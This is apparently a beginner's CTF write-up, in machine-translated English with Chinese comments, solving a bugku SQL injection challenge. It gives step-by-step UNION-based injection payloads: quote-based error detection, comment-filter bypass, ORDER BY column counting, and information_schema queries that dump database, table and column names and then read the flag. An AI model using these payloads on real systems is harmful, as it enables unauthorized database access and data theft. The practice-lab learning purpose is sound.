Put the third day of summer vacation, summer vacation open road brush the question of, how should I say, for three months to learn the security, or need to beat basis, so come bugku brush the question slightly.
Take questions, a look that is sql injection friends. Consequently did not say directly on the payload.
**
Basics:
**
Before doing problems you have to say about the basics:
MySQL has a database information there are three tables, each table has a field. As FIG.
1' //1'报错说明存在注入啦。
2.
1'--+ //我们加上注释之后,按理来说不应该报错,但是为什么报错了呢?当然是把注释过滤了嗷。于是我们可以用
#或者 -- +(注意嗷中间加了空格),结果返回正常说明我们的猜测是正确的。
3.
1' order by 4# //接下来我们就猜列数喽,为什么先猜4呢?因为表格有三列,但是还有某某的成绩单这一列哦。
1' order by 5# //我们接着猜5列,发现竟然报错了。所以只有四列。
4.
-1' union select 1,2,3,database()#//猜完列之后,直接就是联合查询啦,关于联合查询,
要注意前面的数据一定要不存在,后面的语句才能执行嗷。我们看到爆出了数据库名称。
After we learn the basics of the beginning, we can see that there is a way to burst the database:
-1' union select 1,2,3,group_concat(schema_name) from information_schema.schemata#
-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
//在这里我们要注意table表下的数据库名字的字段是table_schema,schemata表下的数据库名字字段是schema_name.此语句的意思是从information_schema的数据库中的table表(information_schema.table)中选取表。where table_schema=database()的意思是此表下的数据库名字。
6.
-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666C3467#
这里的十六进制要注意不要带着引号转换十六进制
7.
-1' union select 1,2,3,skctf_flag from fl4g#
Summary:
About sql injection, but also learn a little white fur, but white still feel sql injection statements do not rote, or to understand the relationship between database tables. (A white or rote or start, remember not solid, re-ponder during the summer ah)